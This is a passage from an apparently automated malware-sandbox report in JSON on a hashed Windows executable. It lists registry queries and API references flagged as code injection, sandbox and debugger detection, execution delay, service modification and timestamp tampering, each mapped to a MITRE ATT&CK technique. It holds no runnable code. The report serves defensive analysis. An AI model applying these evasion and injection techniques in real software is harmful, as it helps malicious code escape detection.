\"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"C1576C273B686607E24365FFB26CF93F2E965690F57AFBA4D4C7585C84365110\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual/sandbox environment\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Contains ability to detect sandbox (imports API)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-192", "type": 2, "relevance": 1, "name": "Contains ability to modify system service (API string)", "description": "Found reference to API \"ChangeServiceConfigA\" (Indicator: \"ChangeServiceConfig\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"ChangeServiceConfigA\" (Indicator: \"ChangeServiceConfig\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-160", "type": 2, "relevance": 1, "name": "Contains ability to perform remote procedure calls (API string)", "description": "Found reference to API \"RpcStringFreeA\" (Indicator: \"RpcStringFree\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")", "origin": "File/Memory", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"OutputDebugStringW\" (Indicator: \"OutputDebugString\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"OutputDebugStringA\" (Indicator: \"OutputDebugString\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"SetUnhandledExceptionFilter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersionExW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersion\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersionExW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersion\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-162", "type": 2, "relevance": 1, "name": "Contains ability to retrieve volume information (API string)", "description": "Found reference to API \"GetVolumeInformationA\" (Indicator: \"GetVolumeInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetVolumeInformationA\" (Indicator: \"GetVolumeInformation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-660", "type": 2, "relevance": 1, "name": "Able to identify virtual/sandbox environment", "description": "Found string \"vboxguestadditions\" (Indicator: \"VBoxGuest\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"GetSystemInfo\" (Indicator: \"GetSystemInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetNativeSystemInfo\" (Indicator: \"GetNativeSystemInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemInfo\" (Indicator: \"GetSystemInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetSystemInfo\" (Indicator: \"GetSystemInfo\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n file/memory contains long string with (Indicator: \"GetCommandLine\"; File: \"DISMHOST.EXE.67A9C8A7.bin\")\n Found string \"GetCursorPos\" (Indicator: \"GetCursorPos\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found string \"GetCursorPos\" (Indicator: \"GetCursorPos\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetUserDefaultUILanguage\" (Indicator: \"GetUserDefaultUILanguage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemDefaultUILanguage\" (Indicator: \"GetSystemDefaultUILanguage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemDefaultUILanguage\" (Indicator: \"GetSystemDefaultUILanguage\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetUserDefaultUILanguage\" (Indicator: \"GetUserDefaultUILanguage\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": 